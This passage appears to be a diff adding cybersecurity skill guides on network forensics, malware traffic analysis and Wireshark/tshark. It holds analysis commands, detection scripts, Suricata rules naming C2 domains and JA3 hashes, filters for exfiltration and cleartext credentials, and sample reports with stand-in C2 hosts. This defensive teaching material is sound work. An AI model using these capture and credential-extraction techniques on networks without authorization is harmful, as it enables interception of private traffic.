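Single large connections are easy to spot, but exfiltration is often spread over many smaller ones. A minimal sketch that totals outbound bytes per source/destination pair, assuming tab-separated input produced by `zeek-cut id.orig_h id.resp_h orig_bytes` (the function name `outbound_bytes_by_pair` is hypothetical):

```python
import sys
from collections import defaultdict


def outbound_bytes_by_pair(lines):
    """Sum orig_bytes per (originator, responder) pair, largest first."""
    totals = defaultdict(int)
    for line in lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) != 3:
            continue
        orig_h, resp_h, orig_bytes = fields
        # Zeek writes "-" for unset values
        if not orig_bytes.isdigit():
            continue
        totals[(orig_h, resp_h)] += int(orig_bytes)
    return sorted(totals.items(), key=lambda item: item[1], reverse=True)


if __name__ == "__main__":
    for (src, dst), total in outbound_bytes_by_pair(sys.stdin)[:20]:
        print(f"{src}\t{dst}\t{total}")
```

Saved under a name of your choice, it can be fed with `cat conn.log | zeek-cut id.orig_h id.resp_h orig_bytes | python3 <script>`.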
|
||||
|
||||
**Wireshark Exfiltration Filters:**
|
||||
```
|
||||
# Large HTTP POST uploads
|
||||
http.request.method == "POST" && tcp.len > 10000
|
||||
|
||||
# FTP data transfers
|
||||
ftp-data && ip.src == 10.0.0.0/8
|
||||
|
||||
# DNS with large TXT responses (tunneling)
|
||||
dns.resp.type == 16 && dns.resp.len > 200
|
||||
```
|
||||
|
||||
### Step 5: Extract and Correlate IOCs
|
||||
|
||||
Pull network-based indicators from traffic analysis:
|
||||
|
||||
- External IP addresses contacted by compromised hosts
|
||||
- Domains resolved via DNS during the incident timeframe
|
||||
- URLs accessed via HTTP/HTTPS (if SSL inspection is in place)
|
||||
- TLS certificate details (subject, issuer, serial number, JA3/JA3S hashes)
|
||||
- User-Agent strings from HTTP requests
|
||||
- File transfers captured in PCAP (extract using Wireshark Export Objects)
|
||||
|
||||
### Step 6: Document Network Forensic Findings
|
||||
|
||||
Compile analysis into a structured report with evidence references:
|
||||
|
||||
- Reference specific PCAP files, frame numbers, and timestamps for each finding
|
||||
- Include packet captures of key evidence as screenshots or exported PDFs
|
||||
- Map network activity to the incident timeline
|
||||
- Correlate network findings with host-based evidence from endpoint forensics
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|------|------------|
| **PCAP (Packet Capture)** | File format storing raw network packets captured from a network interface for offline analysis |
| **Beaconing** | Regular, periodic network connections from a compromised host to a C2 server, identifiable by consistent timing intervals |
| **JA3/JA3S** | TLS client and server fingerprinting method based on ClientHello and ServerHello parameters; fingerprints are often distinctive for a client application but are not guaranteed to be unique |
| **NetFlow/IPFIX** | Network traffic metadata (source, destination, ports, bytes, duration) collected by routers and switches without full packet capture |
| **DNS Tunneling** | Technique encoding data in DNS queries and responses to exfiltrate data or maintain C2 through DNS protocol |
| **Network Tap** | Hardware device that creates an exact copy of network traffic for monitoring without impacting network performance |
| **Zeek Logs** | Structured metadata logs generated by the Zeek network analysis framework covering connections, DNS, HTTP, SSL, and more |
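
To make the JA3 entry concrete: a JA3 fingerprint is the MD5 of a comma-separated string built from five ClientHello fields (TLS version, cipher suites, extensions, elliptic curves, point formats), each list joined with dashes and with GREASE values removed. A minimal sketch, assuming the numeric field values have already been extracted from the handshake (`ja3_fingerprint` is a hypothetical helper, not a library API):

```python
import hashlib


def is_grease(value: int) -> bool:
    """GREASE values have the form 0x?A?A with both bytes equal (0x0A0A ... 0xFAFA)."""
    return (value & 0x0F0F) == 0x0A0A and (value >> 8) == (value & 0xFF)


def ja3_fingerprint(version, ciphers, extensions, curves, point_formats):
    """Return (ja3_string, md5_hex) for already-parsed ClientHello fields."""
    groups = []
    for group in (ciphers, extensions, curves, point_formats):
        groups.append("-".join(str(v) for v in group if not is_grease(v)))
    ja3_string = ",".join([str(version)] + groups)
    return ja3_string, hashlib.md5(ja3_string.encode("ascii")).hexdigest()
```

Because the hash depends on the TLS library and its configuration, different programs built on the same stack can share a fingerprint.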
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Wireshark**: Open-source packet analyzer for deep inspection of network protocols at the packet level
|
||||
- **Zeek (formerly Bro)**: Network analysis framework generating structured metadata logs from live or captured traffic
|
||||
- **Arkime (formerly Moloch)**: Open-source full packet capture and search platform for large-scale network forensics
|
||||
- **NetworkMiner**: Network forensic analysis tool for extracting files, images, and credentials from PCAP files
|
||||
- **RITA (Real Intelligence Threat Analytics)**: Open-source beacon detection and DNS tunneling analysis tool for Zeek logs
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Confirming C2 Beaconing and Quantifying Exfiltration
|
||||
|
||||
**Context**: EDR detects a suspicious process on a workstation but cannot determine the volume of data exfiltrated. Network team provides PCAP from the full packet capture appliance covering the incident timeframe.
|
||||
|
||||
**Approach**:
|
||||
1. Filter PCAP to traffic from the compromised host IP to external destinations
|
||||
2. Identify the C2 channel by analyzing connection timing patterns (beacon detection)
|
||||
3. Extract TLS certificate and JA3 hash from the C2 connection for IOC generation
|
||||
4. Calculate total bytes transferred to C2 infrastructure over the incident duration
|
||||
5. Check for additional exfiltration channels (DNS tunneling, cloud storage uploads)
|
||||
6. Extract any unencrypted files transferred using Wireshark Export Objects feature
|
||||
|
||||
**Pitfalls**:
|
||||
- Analyzing only HTTP traffic when C2 is operating over HTTPS without SSL inspection
|
||||
- Missing DNS tunneling because the data volume per query is small (but total over time is significant)
|
||||
- Not correlating network timestamps with endpoint timestamps (timezone mismatches)
|
||||
- Overlooking legitimate cloud services abused for exfiltration (OneDrive, Google Drive, Dropbox)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
NETWORK TRAFFIC ANALYSIS REPORT
|
||||
=================================
|
||||
Incident: INC-2025-1547
|
||||
Analyst: [Name]
|
||||
Capture Source: Arkime full packet capture
|
||||
Analysis Period: 2025-11-15 14:00 UTC - 2025-11-15 18:00 UTC
|
||||
Total PCAP Size: 4.7 GB
|
||||
|
||||
C2 COMMUNICATIONS
|
||||
Source: 10.1.5.42 (WKSTN-042)
|
||||
Destination: 185.220.101.42:443 (HTTPS)
|
||||
Beacon Interval: 60 seconds ± 12% jitter
|
||||
Sessions: 237 connections over 4 hours
|
||||
JA3 Hash: a0e9f5d64349fb13191bc781f81f42e1
|
||||
TLS Certificate: CN=update.evil[.]com (self-signed)
|
||||
Total Data Sent: 147 MB (outbound)
|
||||
Total Data Recv: 2.3 MB (inbound - commands)
|
||||
|
||||
LATERAL MOVEMENT
|
||||
10.1.5.42 → 10.1.10.15 (SMB, TCP 445) - 14:35 UTC
|
||||
10.1.5.42 → 10.1.10.20 (RDP, TCP 3389) - 14:42 UTC
|
||||
10.1.5.42 → 10.1.1.5 (LDAP, TCP 389) - 15:10 UTC
|
||||
|
||||
EXFILTRATION SUMMARY
|
||||
Protocol: HTTPS to C2 server
|
||||
Volume: 147 MB outbound
|
||||
Duration: 14:23 UTC - 18:00 UTC
|
||||
Files Extracted: [list if recoverable from unencrypted channels]
|
||||
|
||||
DNS ANALYSIS
|
||||
Suspicious Queries: 0 DNS tunneling indicators
|
||||
DGA Detection: 0 algorithmically generated domains
|
||||
|
||||
EVIDENCE REFERENCES
|
||||
PCAP File: INC-2025-1547_capture.pcap (SHA-256: ...)
|
||||
Zeek Logs: /logs/zeek/2025-11-15/ (conn.log, ssl.log, dns.log)
|
||||
```
|
||||
@@ -0,0 +1,324 @@
|
||||
---
|
||||
name: analyzing-network-traffic-of-malware
|
||||
description: >
|
||||
Analyzes network traffic generated by malware during sandbox execution or live incident
|
||||
response to identify C2 protocols, data exfiltration channels, payload downloads, and
|
||||
lateral movement patterns using Wireshark, Zeek, and Suricata. Activates for requests
|
||||
involving malware network analysis, C2 traffic decoding, malware PCAP analysis, or
|
||||
network-based malware detection.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, network-analysis, PCAP, Wireshark, C2-detection]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Network Traffic of Malware
|
||||
|
||||
## When to Use
|
||||
|
||||
- Sandbox execution has captured a PCAP file and the network behavior needs detailed analysis
|
||||
- Identifying the C2 protocol structure for writing network detection signatures
|
||||
- Determining what data the malware exfiltrates and to which external infrastructure
|
||||
- Analyzing DNS tunneling, domain generation algorithms (DGA), or fast-flux behavior
|
||||
- Creating Suricata/Snort signatures based on observed malware network patterns
|
||||
|
||||
**Do not use** for host-based analysis of malware behavior; use Cuckoo sandbox reports or Volatility memory analysis for process-level activity.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Wireshark 4.x installed for interactive PCAP analysis
|
||||
- tshark (Wireshark CLI) for scripted packet extraction
|
||||
- Zeek installed for automated metadata generation from PCAPs
|
||||
- Suricata with ET Open/ET Pro rulesets for signature matching
|
||||
- NetworkMiner for file extraction and credential detection from PCAPs
|
||||
- Python 3.8+ with `scapy` and `dpkt` for programmatic packet analysis
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Initial PCAP Overview
|
||||
|
||||
Get a high-level understanding of the network traffic:
|
||||
|
||||
```bash
|
||||
# Capture statistics
|
||||
capinfos malware.pcap
|
||||
|
||||
# Protocol hierarchy
|
||||
tshark -r malware.pcap -q -z io,phs
|
||||
|
||||
# Endpoint statistics (top talkers)
|
||||
tshark -r malware.pcap -q -z endpoints,ip
|
||||
|
||||
# Conversation statistics
|
||||
tshark -r malware.pcap -q -z conv,tcp
|
||||
|
||||
# DNS query summary
|
||||
tshark -r malware.pcap -q -z dns,tree
|
||||
```
|
||||
|
||||
### Step 2: Analyze DNS Activity
|
||||
|
||||
Examine DNS queries for DGA, tunneling, or C2 domain resolution:
|
||||
|
||||
```bash
|
||||
# Extract DNS responses with the queried name and resolved A records
|
||||
tshark -r malware.pcap -T fields -e frame.time -e dns.qry.name -e dns.a \
|
||||
-Y "dns.flags.response == 1" | sort
|
||||
|
||||
# Detect DGA patterns (high entropy domain names)
python3 << 'PYEOF'
import math
import subprocess
from collections import Counter

def entropy(s):
    """Shannon entropy of a string, in bits per character."""
    p = [n / len(s) for n in Counter(s).values()]
    return -sum(pi * math.log2(pi) for pi in p if pi > 0)

# Parse DNS queries from tshark output
result = subprocess.run(
    ["tshark", "-r", "malware.pcap", "-T", "fields", "-e", "dns.qry.name",
     "-Y", "dns.flags.response == 0"],
    capture_output=True, text=True
)

domains = set(result.stdout.strip().split('\n'))
print("Suspicious DNS queries (high entropy):")
for domain in domains:
    if domain:
        subdomain = domain.split('.')[0]
        ent = entropy(subdomain)
        if ent > 3.5 and len(subdomain) > 10:
            print(f"  {domain} (entropy: {ent:.2f})")
PYEOF
|
||||
|
||||
# Detect DNS tunneling (large TXT responses)
|
||||
tshark -r malware.pcap -T fields -e dns.qry.name -e dns.txt \
|
||||
-Y "dns.resp.type == 16 and dns.resp.len > 100"
|
||||
```
|
||||
|
||||
### Step 3: Analyze HTTP/HTTPS C2 Communication
|
||||
|
||||
Examine web-based command-and-control traffic:
|
||||
|
||||
```bash
|
||||
# Extract HTTP requests
|
||||
tshark -r malware.pcap -T fields \
|
||||
-e frame.time -e ip.src -e ip.dst -e http.host \
|
||||
-e http.request.method -e http.request.uri -e http.user_agent \
|
||||
-Y "http.request"
|
||||
|
||||
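# List large HTTP responses (potential payload downloads)
# Request fields such as http.host are empty on response packets,
# so use the linked request URI and the Content-Length value instead
tshark -r malware.pcap -T fields \
  -e ip.src -e http.response_for.uri -e http.content_type -e http.content_length \
  -Y "http.response and http.content_length > 1000"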
|
||||
|
||||
# Extract POST data (potential exfiltration)
|
||||
tshark -r malware.pcap -T fields \
|
||||
-e http.host -e http.request.uri -e http.file_data \
|
||||
-Y "http.request.method == POST"
|
||||
|
||||
# TLS analysis (SNI, JA3 fingerprints)
|
||||
tshark -r malware.pcap -T fields \
|
||||
-e tls.handshake.extensions_server_name \
|
||||
-e tls.handshake.ja3 \
|
||||
-Y "tls.handshake.type == 1"
|
||||
|
||||
# Extract TLS certificate details
|
||||
tshark -r malware.pcap -T fields \
|
||||
-e x509ce.dNSName -e x509af.serialNumber \
|
||||
-e x509sat.uTF8String \
|
||||
-Y "tls.handshake.type == 11"
|
||||
|
||||
# Export HTTP objects (downloaded files)
|
||||
tshark -r malware.pcap --export-objects http,exported_files/
|
||||
```
|
||||
|
||||
### Step 4: Detect Beaconing Patterns
|
||||
|
||||
Identify regular periodic communication indicating C2 beaconing:
|
||||
|
||||
```python
|
||||
# Beacon detection from PCAP
from scapy.all import rdpcap, IP, TCP
from collections import defaultdict
import statistics

packets = rdpcap("malware.pcap")

# Group connection attempts by destination IP:port
connections = defaultdict(list)
for pkt in packets:
    if IP in pkt and TCP in pkt:
        # Initial SYN only (SYN set, ACK clear); counting SYN-ACK replies
        # would record the client as a destination as well
        if (int(pkt[TCP].flags) & 0x12) == 0x02:
            dst = f"{pkt[IP].dst}:{pkt[TCP].dport}"
            connections[dst].append(float(pkt.time))

# Analyze timing intervals for beaconing
print("Beacon Analysis:")
for dst, times in connections.items():
    if len(times) >= 5:
        intervals = [times[i+1] - times[i] for i in range(len(times)-1)]
        avg = statistics.mean(intervals)
        stdev = statistics.stdev(intervals) if len(intervals) > 1 else 0
        jitter = (stdev / avg * 100) if avg > 0 else 0

        if 10 < avg < 3600 and jitter < 30:  # Regular interval with < 30% jitter
            print(f"  [!] {dst}: {len(times)} connections")
            print(f"      Interval: {avg:.1f}s ± {stdev:.1f}s (jitter: {jitter:.1f}%)")
            print(f"      Pattern: LIKELY BEACONING")
|
||||
```
|
||||
|
||||
### Step 5: Generate Network Detection Signatures
|
||||
|
||||
Create Suricata/Snort rules from observed traffic patterns:
|
||||
|
||||
```bash
|
||||
# Run Suricata against the PCAP for existing signature matches
|
||||
suricata -r malware.pcap -l suricata_output/ -c /etc/suricata/suricata.yaml
|
||||
|
||||
# Review alerts
|
||||
cat suricata_output/fast.log
|
||||
|
||||
# Create custom Suricata rule from observed patterns
|
||||
cat << 'EOF' > custom_malware.rules
|
||||
# C2 beacon detection based on observed URI pattern
# (multi-line rules need a trailing backslash on every continued line,
#  and a literal ";" inside content must be written as |3b|)
alert http $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"MALWARE MalwareX C2 Beacon"; \
    flow:established,to_server; \
    http.method; content:"POST"; \
    http.uri; content:"/gate.php?id="; \
    http.user_agent; content:"Mozilla/5.0 (compatible|3b| MSIE 10.0)"; \
    sid:9000001; rev:1; \
)

# DNS query for known C2 domain
alert dns $HOME_NET any -> any any ( \
    msg:"MALWARE MalwareX C2 DNS Query"; \
    dns.query; content:"update.malicious.com"; nocase; \
    sid:9000002; rev:1; \
)

# JA3 hash match for malware TLS client
alert tls $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"MALWARE MalwareX JA3 Match"; \
    ja3.hash; content:"a0e9f5d64349fb13191bc781f81f42e1"; \
    sid:9000003; rev:1; \
)
|
||||
EOF
|
||||
```
|
||||
|
||||
### Step 6: Extract Files and Artifacts from Traffic
|
||||
|
||||
Recover transferred files and embedded data:
|
||||
|
||||
```bash
|
||||
# Extract files using Zeek
|
||||
zeek -r malware.pcap /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
|
||||
ls extract_files/
|
||||
|
||||
# Extract files using NetworkMiner (GUI)
|
||||
# Or use tshark for specific protocol exports
|
||||
tshark -r malware.pcap --export-objects http,http_objects/
|
||||
tshark -r malware.pcap --export-objects smb,smb_objects/
|
||||
tshark -r malware.pcap --export-objects tftp,tftp_objects/
|
||||
|
||||
# Hash all extracted files
|
||||
sha256sum http_objects/* smb_objects/* tftp_objects/* 2>/dev/null
|
||||
|
||||
# Generate Zeek logs for comprehensive metadata
|
||||
zeek -r malware.pcap
|
||||
# Output: conn.log, dns.log, http.log, ssl.log, files.log, etc.
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Beaconing** | Regular periodic connections from malware to C2 server, identifiable by consistent time intervals and packet sizes |
|
||||
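| **JA3/JA3S** | TLS fingerprinting method that hashes ClientHello (JA3) and ServerHello (JA3S) parameters to fingerprint TLS implementations; every client built on the same TLS stack shares a hash, so a match is a strong lead rather than unique proof of a malware family |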
|
||||
| **DGA (Domain Generation Algorithm)** | Algorithm generating pseudo-random domain names that malware queries to locate C2 servers, evading static domain blocklists |
|
||||
| **DNS Tunneling** | Encoding data in DNS queries and responses to establish a C2 channel or exfiltrate data through DNS infrastructure |
|
||||
| **Fast Flux** | DNS technique rapidly rotating IP addresses for a domain to avoid takedown and distribute C2 across many compromised hosts |
|
||||
| **SNI (Server Name Indication)** | TLS extension revealing the hostname the client is connecting to; sent in cleartext in the ClientHello of HTTPS connections unless Encrypted Client Hello (ECH) is in use |
|
||||
| **Network Signature** | Suricata/Snort rule matching specific patterns in network traffic (headers, payloads, timing) to detect malicious communications |
|
||||
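The JA3 entry above can be made concrete with a short sketch. JA3 concatenates five ClientHello fields (TLS version, cipher suites, extensions, elliptic curves, point formats) as decimal values, dash-separated within a field and comma-separated between fields, skips GREASE values, and takes the MD5 of the result. The function names `ja3_string` and `ja3_hash` are illustrative only; in practice the field values would come from a parser such as tshark or Zeek rather than being typed by hand.

```python
import hashlib

# GREASE values (RFC 8701): 0x0A0A, 0x1A1A, ..., 0xFAFA are excluded from JA3 input
GREASE = {0x0A0A + 0x1010 * i for i in range(16)}


def ja3_string(version, ciphers, extensions, curves, point_formats):
    """Build the JA3 input string from decimal ClientHello values."""
    def join(values):
        return "-".join(str(v) for v in values if v not in GREASE)

    return ",".join([
        str(version),
        join(ciphers),
        join(extensions),
        join(curves),
        join(point_formats),
    ])


def ja3_hash(version, ciphers, extensions, curves, point_formats):
    """MD5 hex digest of the JA3 string (32 lowercase hex characters)."""
    text = ja3_string(version, ciphers, extensions, curves, point_formats)
    return hashlib.md5(text.encode("ascii")).hexdigest()
```

Because the hash depends only on these five lists, two unrelated programs linked against the same TLS library usually produce the same value, which is why a JA3 match should be corroborated with SNI, certificate, or timing evidence.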
|
||||
## Tools & Systems
|
||||
|
||||
- **Wireshark**: Open-source packet analyzer for deep interactive inspection of network traffic at the protocol level
|
||||
- **Zeek**: Network analysis framework generating structured metadata logs (conn, dns, http, ssl) from live or captured traffic
|
||||
- **Suricata**: High-performance network IDS/IPS for signature-based detection with Lua scripting for custom detection logic
|
||||
- **NetworkMiner**: Network forensic analysis tool for extracting files, images, and credentials from PCAP files
|
||||
- **Scapy**: Python packet manipulation library for programmatic packet analysis, beacon detection, and protocol decoding
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Decoding a Custom Binary C2 Protocol
|
||||
|
||||
**Context**: Malware communicates with its C2 server using a custom binary protocol over TCP port 8443. Standard HTTP analysis yields no results. The protocol structure needs to be reverse engineered from the PCAP.
|
||||
|
||||
**Approach**:
|
||||
1. Filter the PCAP for TCP port 8443 conversations and follow the TCP stream
|
||||
2. Identify the message framing (length prefix, delimiter, fixed-size headers)
|
||||
3. Compare multiple messages to identify static header fields vs variable data fields
|
||||
4. Cross-reference with reverse engineering findings from Ghidra (if the binary was analyzed)
|
||||
5. Write a Wireshark dissector or Scapy parser for the custom protocol
|
||||
6. Create Suricata rules matching the static header bytes for network detection
|
||||
7. Document the full protocol specification for threat intelligence sharing
|
||||
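Steps 2 and 5 of the approach can be sketched as a small parser. The framing below is purely hypothetical (a 2-byte big-endian message type followed by a 4-byte big-endian payload length); the real layout has to be inferred from the captured stream, and `parse_frames` is an illustrative name rather than part of any tool.

```python
import struct
from typing import Iterator, Tuple

# Hypothetical header layout: 2-byte message type, 4-byte payload length (big-endian)
HEADER = struct.Struct(">HI")


def parse_frames(stream: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (message_type, payload) pairs from one reassembled TCP stream direction."""
    offset = 0
    while offset + HEADER.size <= len(stream):
        msg_type, length = HEADER.unpack_from(stream, offset)
        start = offset + HEADER.size
        end = start + length
        if end > len(stream):
            break  # final message is truncated in the capture
        yield msg_type, stream[start:end]
        offset = end
```

Feeding it the raw bytes of a followed stream and tabulating the message types and payload sizes makes it easier to separate static header fields from variable data. If the parser desynchronizes after a few messages, the framing guess is wrong.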
|
||||
**Pitfalls**:
|
||||
- Analyzing only the first few packets; some C2 protocols change behavior after initial handshake
|
||||
- Not decrypting TLS traffic when the sandbox has MITM capabilities
|
||||
- Confusing legitimate CDN or cloud traffic with C2 (validate destination IPs)
|
||||
- Missing C2 traffic that uses DNS or ICMP instead of TCP/UDP
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
MALWARE NETWORK TRAFFIC ANALYSIS
|
||||
===================================
|
||||
PCAP File: malware_sandbox.pcap
|
||||
Duration: 300 seconds
|
||||
Total Packets: 12,847
|
||||
Total Bytes: 4.2 MB
|
||||
|
||||
DNS ACTIVITY
|
||||
Total Queries: 47
|
||||
DGA Detected: Yes (23 high-entropy queries to .com TLD)
|
||||
Tunneling: No
|
||||
Resolved C2: update.malicious[.]com -> 185.220.101[.]42
|
||||
|
||||
C2 COMMUNICATION
|
||||
Protocol: HTTPS (TLS 1.2)
|
||||
Server: 185.220.101[.]42:443
|
||||
SNI: update.malicious[.]com
|
||||
JA3 Hash: a0e9f5d64349fb13191bc781f81f42e1
|
||||
Beacon Interval: 60.2s ± 6.8s (11.3% jitter)
|
||||
Total Sessions: 237
|
||||
Data Sent: 147 MB
|
||||
Data Received: 2.3 MB
|
||||
Certificate: CN=update.malicious[.]com (self-signed, expired)
|
||||
|
||||
PAYLOAD DOWNLOADS
|
||||
GET /payload.dll from compromised-site[.]com
|
||||
Size: 98,304 bytes
|
||||
SHA-256: abc123def456...
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
EXFILTRATION
|
||||
Method: HTTPS POST to /gate.php
|
||||
Content-Type: application/octet-stream
|
||||
Average Size: 15,432 bytes per request
|
||||
Total Volume: 147 MB over 4 hours
|
||||
|
||||
SURICATA ALERTS
|
||||
[1:2028401] ET MALWARE Generic C2 Beacon Pattern
|
||||
[1:2028500] ET POLICY Self-Signed Certificate
|
||||
|
||||
GENERATED SIGNATURES
|
||||
SID 9000001: MalwareX HTTP beacon pattern
|
||||
SID 9000002: MalwareX DNS C2 domain
|
||||
SID 9000003: MalwareX JA3 TLS fingerprint
|
||||
```
|
||||
@@ -0,0 +1,218 @@
|
||||
---
|
||||
name: analyzing-network-traffic-with-wireshark
|
||||
description: >
|
||||
Captures and analyzes network packet data using Wireshark and tshark to identify
|
||||
malicious traffic patterns, diagnose protocol issues, extract artifacts, and
|
||||
support incident response investigations on authorized network segments.
|
||||
domain: cybersecurity
|
||||
subdomain: network-security
|
||||
tags: [network-security, wireshark, packet-analysis, traffic-analysis, pcap]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Network Traffic with Wireshark
|
||||
|
||||
## When to Use
|
||||
|
||||
- Investigating suspected network intrusions by examining packet-level evidence of command-and-control traffic, data exfiltration, or lateral movement
|
||||
- Diagnosing network performance issues such as retransmissions, fragmentation, or DNS resolution failures
|
||||
- Analyzing malware communication patterns by capturing traffic from sandboxed or isolated hosts
|
||||
- Validating firewall and IDS rules by confirming what traffic is actually traversing network segments
|
||||
- Extracting files, credentials, or indicators of compromise from captured network sessions
|
||||
|
||||
**Do not use** to capture traffic on networks without authorization, to intercept private communications without legal authority, or as a substitute for full-featured SIEM platforms in production monitoring.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Wireshark 4.0+ and tshark command-line utility installed
|
||||
- Root/sudo privileges or membership in the `wireshark` group for live packet capture
|
||||
- Network interface access (physical NIC, span port, or network tap) to the monitored segment
|
||||
- Sufficient disk space for packet capture files (a saturated gigabit link produces about 7.5 GB per minute; budget roughly 1 GB per minute for a moderately busy link)
|
||||
- Familiarity with TCP/IP protocols, HTTP, DNS, TLS, and SMB at the packet level
|
||||
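The disk-space prerequisite can be sanity-checked with simple arithmetic before starting a long capture. This is a rough sketch: `capture_size_gb` is an illustrative helper, the utilization figure is an assumption you supply, and per-packet pcapng overhead is ignored.

```python
def capture_size_gb(link_mbps: float, utilization: float, seconds: float) -> float:
    """Approximate capture size in GB (10^9 bytes) for a full-packet capture.

    link_mbps   -- nominal link speed in megabits per second
    utilization -- average fraction of the link in use (0.0 to 1.0)
    seconds     -- planned capture duration
    """
    bytes_per_second = link_mbps * 1_000_000 / 8 * utilization
    return bytes_per_second * seconds / 1e9
```

For example, `capture_size_gb(1000, 1.0, 60)` gives 7.5 GB for one minute of a fully saturated gigabit link, while about 13% utilization lands near 1 GB per minute.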
|
||||
## Workflow
|
||||
|
||||
### Step 1: Configure Capture Environment
|
||||
|
||||
Set up the capture interface and filters to target relevant traffic:
|
||||
|
||||
```bash
|
||||
# List available interfaces
|
||||
tshark -D
|
||||
|
||||
# Start capture on eth0 with a capture filter to limit scope
|
||||
tshark -i eth0 -f "host 10.10.5.23 and (port 80 or port 443 or port 445)" -w /tmp/capture.pcapng
|
||||
|
||||
# Capture with ring buffer to manage disk usage (10 files, 100MB each)
|
||||
tshark -i eth0 -b filesize:102400 -b files:10 -w /tmp/rolling_capture.pcapng
|
||||
|
||||
# Capture on multiple interfaces simultaneously
|
||||
tshark -i eth0 -i eth1 -w /tmp/multi_interface.pcapng
|
||||
```
|
||||
|
||||
For Wireshark GUI, set capture filter in the Capture Options dialog before starting.
|
||||
|
||||
### Step 2: Apply Display Filters for Targeted Analysis
|
||||
|
||||
```bash
|
||||
# Filter HTTP traffic containing suspicious user agents
|
||||
tshark -r capture.pcapng -Y "http.user_agent contains \"curl\" or http.user_agent contains \"Wget\""
|
||||
|
||||
# Find DNS queries to suspicious TLDs
|
||||
tshark -r capture.pcapng -Y 'dns.qry.name matches "\\.(xyz|top|tk)$"'
|
||||
|
||||
# Identify TCP retransmissions indicating network issues
|
||||
tshark -r capture.pcapng -Y "tcp.analysis.retransmission"
|
||||
|
||||
# Filter SMB traffic for lateral movement detection
|
||||
tshark -r capture.pcapng -Y "smb2.cmd == 5 or smb2.cmd == 3" -T fields -e ip.src -e ip.dst -e smb2.filename
|
||||
|
||||
# Find cleartext credential transmission
|
||||
tshark -r capture.pcapng -Y "ftp.request.command == \"PASS\" or http.authbasic"
|
||||
|
||||
# Detect beaconing patterns (regular interval connections)
|
||||
tshark -r capture.pcapng -Y "ip.dst == 203.0.113.50" -T fields -e frame.time_relative -e ip.src -e tcp.dstport
|
||||
```
|
||||
|
||||
### Step 3: Protocol-Specific Deep Analysis
|
||||
|
||||
```bash
|
||||
# Follow a TCP stream to reconstruct a conversation
|
||||
tshark -r capture.pcapng -q -z follow,tcp,ascii,0
|
||||
|
||||
# Analyze HTTP request/response pairs
|
||||
tshark -r capture.pcapng -Y "http" -T fields -e frame.time -e ip.src -e ip.dst -e http.request.method -e http.request.uri -e http.response.code
|
||||
|
||||
# Extract DNS query/response statistics
|
||||
tshark -r capture.pcapng -q -z dns,tree
|
||||
|
||||
# Analyze TLS handshakes for weak cipher suites
|
||||
tshark -r capture.pcapng -Y "tls.handshake.type == 2" -T fields -e ip.src -e ip.dst -e tls.handshake.ciphersuite
|
||||
|
||||
# SMB file access enumeration
|
||||
tshark -r capture.pcapng -Y "smb2" -T fields -e frame.time -e ip.src -e ip.dst -e smb2.filename -e smb2.cmd
|
||||
```
|
||||
|
||||
### Step 4: Extract Artifacts and IOCs
|
||||
|
||||
```bash
|
||||
# Export HTTP objects (files transferred over HTTP)
|
||||
tshark -r capture.pcapng --export-objects http,/tmp/http_objects/
|
||||
|
||||
# Export SMB objects (files transferred over SMB)
|
||||
tshark -r capture.pcapng --export-objects smb,/tmp/smb_objects/
|
||||
|
||||
# Extract all unique destination IPs for threat intelligence lookup
|
||||
tshark -r capture.pcapng -T fields -e ip.dst | sort -u > unique_dest_ips.txt
|
||||
|
||||
# Extract SSL/TLS certificate information
|
||||
tshark -r capture.pcapng -Y "tls.handshake.type == 11" -T fields -e x509sat.uTF8String -e x509ce.dNSName
|
||||
|
||||
# Extract all URLs accessed
|
||||
tshark -r capture.pcapng -Y "http.request" -T fields -e http.host -e http.request.uri | sort -u > urls.txt
|
||||
|
||||
# Hash extracted files for IOC matching
|
||||
find /tmp/http_objects/ -type f -exec sha256sum {} \; > extracted_file_hashes.txt
|
||||
```
|
||||
|
||||
### Step 5: Statistical Analysis and Anomaly Detection
|
||||
|
||||
```bash
|
||||
# Protocol hierarchy statistics
|
||||
tshark -r capture.pcapng -q -z io,phs
|
||||
|
||||
# Conversation statistics for TCP and UDP (tshark sorts the table by total frames)
|
||||
tshark -r capture.pcapng -q -z conv,tcp -z conv,udp
|
||||
|
||||
# Identify top talkers
|
||||
tshark -r capture.pcapng -q -z endpoints,ip
|
||||
|
||||
# IO graph data (packets per second)
|
||||
tshark -r capture.pcapng -q -z io,stat,1,"COUNT(frame) frame"
|
||||
|
||||
# Detect port scanning (count distinct destination ports probed per source/target pair)
tshark -r capture.pcapng -Y "tcp.flags.syn == 1 and tcp.flags.ack == 0" -T fields -e ip.src -e ip.dst -e tcp.dstport | sort -u | cut -f1,2 | sort | uniq -c | sort -rn | head -20
|
||||
```
|
||||
|
||||
### Step 6: Generate Reports and Export Evidence
|
||||
|
||||
```bash
|
||||
# Export filtered packets to a new PCAP for evidence preservation
|
||||
tshark -r capture.pcapng -Y "ip.addr == 10.10.5.23 and tcp.port == 4444" -w evidence_c2_traffic.pcapng
|
||||
|
||||
# Generate packet summary in CSV format
|
||||
tshark -r capture.pcapng -T fields -E header=y -E separator=, -e frame.number -e frame.time -e ip.src -e ip.dst -e ip.proto -e tcp.srcport -e tcp.dstport -e frame.len > traffic_summary.csv
|
||||
|
||||
# Create PDML (XML) output for programmatic analysis
|
||||
tshark -r capture.pcapng -T pdml > capture_analysis.xml
|
||||
|
||||
